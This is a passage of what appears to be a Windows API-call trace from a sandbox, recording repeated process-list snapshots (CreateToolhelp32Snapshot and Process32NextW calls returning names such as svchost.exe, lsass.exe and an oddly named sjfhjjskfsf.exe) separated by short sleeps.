th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0218.737] Process32NextW (in: hSnapshot=0x1d4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0218.737] Process32NextW (in: hSnapshot=0x1d4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0218.738] Process32NextW (in: hSnapshot=0x1d4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0218.738] Process32NextW (in: hSnapshot=0x1d4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0218.738] Process32NextW (in: hSnapshot=0x1d4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0218.739] Process32NextW (in: hSnapshot=0x1d4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0218.739] Process32NextW (in: hSnapshot=0x1d4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.739] Process32NextW (in: hSnapshot=0x1d4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.740] Process32NextW (in: hSnapshot=0x1d4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.740] Process32NextW (in: hSnapshot=0x1d4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.740] Process32NextW (in: hSnapshot=0x1d4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.740] Process32NextW (in: hSnapshot=0x1d4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0218.741] Process32NextW (in: hSnapshot=0x1d4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.741] Process32NextW (in: hSnapshot=0x1d4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.741] Process32NextW (in: hSnapshot=0x1d4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0218.742] Process32NextW (in: hSnapshot=0x1d4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0218.742] Process32NextW (in: hSnapshot=0x1d4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0218.742] Process32NextW (in: hSnapshot=0x1d4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0218.742] Process32NextW (in: hSnapshot=0x1d4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0218.743] Process32NextW (in: hSnapshot=0x1d4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.743] Process32NextW (in: hSnapshot=0x1d4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0218.743] Process32NextW (in: hSnapshot=0x1d4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0218.744] Process32NextW (in: hSnapshot=0x1d4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0218.744] Process32NextW (in: hSnapshot=0x1d4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0218.744] Sleep (dwMilliseconds=0x64) [0218.852] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d8 [0218.854] Process32FirstW (in: hSnapshot=0x1d8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0218.854] Process32NextW (in: hSnapshot=0x1d8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0218.854] Process32NextW (in: hSnapshot=0x1d8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0218.855] Process32NextW (in: hSnapshot=0x1d8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0218.855] Process32NextW (in: hSnapshot=0x1d8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0218.855] Process32NextW (in: hSnapshot=0x1d8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0218.856] Process32NextW (in: hSnapshot=0x1d8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0218.856] Process32NextW (in: hSnapshot=0x1d8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0218.856] Process32NextW (in: hSnapshot=0x1d8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0218.856] Process32NextW (in: hSnapshot=0x1d8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0218.857] Process32NextW (in: hSnapshot=0x1d8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.857] Process32NextW (in: hSnapshot=0x1d8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.857] Process32NextW (in: hSnapshot=0x1d8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.857] Process32NextW (in: hSnapshot=0x1d8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.858] Process32NextW (in: hSnapshot=0x1d8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.858] Process32NextW (in: hSnapshot=0x1d8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0218.858] Process32NextW (in: hSnapshot=0x1d8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.859] Process32NextW (in: hSnapshot=0x1d8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.859] Process32NextW (in: hSnapshot=0x1d8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0218.859] Process32NextW (in: hSnapshot=0x1d8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0218.859] Process32NextW (in: hSnapshot=0x1d8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0218.860] Process32NextW (in: hSnapshot=0x1d8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0218.860] Process32NextW (in: hSnapshot=0x1d8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0218.860] Process32NextW (in: hSnapshot=0x1d8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.860] Process32NextW (in: hSnapshot=0x1d8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0218.861] Process32NextW (in: hSnapshot=0x1d8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0218.861] Process32NextW (in: hSnapshot=0x1d8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0218.861] Process32NextW (in: hSnapshot=0x1d8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0218.862] Sleep (dwMilliseconds=0x64) [0218.966] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dc [0218.968] Process32FirstW (in: hSnapshot=0x1dc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0218.968] Process32NextW (in: hSnapshot=0x1dc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0218.968] Process32NextW (in: hSnapshot=0x1dc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0218.968] Process32NextW (in: hSnapshot=0x1dc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0218.969] Process32NextW (in: hSnapshot=0x1dc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0218.969] Process32NextW (in: hSnapshot=0x1dc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0218.969] Process32NextW (in: hSnapshot=0x1dc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0218.970] Process32NextW (in: hSnapshot=0x1dc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0218.970] Process32NextW (in: hSnapshot=0x1dc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0218.970] Process32NextW (in: hSnapshot=0x1dc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0218.970] Process32NextW (in: hSnapshot=0x1dc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.971] Process32NextW (in: hSnapshot=0x1dc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.971] Process32NextW (in: hSnapshot=0x1dc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.971] Process32NextW (in: hSnapshot=0x1dc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.971] Process32NextW (in: hSnapshot=0x1dc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.972] Process32NextW (in: hSnapshot=0x1dc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0218.972] Process32NextW (in: hSnapshot=0x1dc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.972] Process32NextW (in: hSnapshot=0x1dc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.973] Process32NextW (in: hSnapshot=0x1dc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0218.973] Process32NextW (in: hSnapshot=0x1dc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0218.973] Process32NextW (in: hSnapshot=0x1dc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0218.973] Process32NextW (in: hSnapshot=0x1dc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0218.974] Process32NextW (in: hSnapshot=0x1dc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0218.974] Process32NextW (in: hSnapshot=0x1dc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.974] Process32NextW (in: hSnapshot=0x1dc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0218.975] Process32NextW (in: hSnapshot=0x1dc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0218.975] Process32NextW (in: hSnapshot=0x1dc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0218.975] Process32NextW (in: hSnapshot=0x1dc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0218.975] Sleep (dwMilliseconds=0x64) [0219.070] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1e0 [0219.071] Process32FirstW (in: hSnapshot=0x1e0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 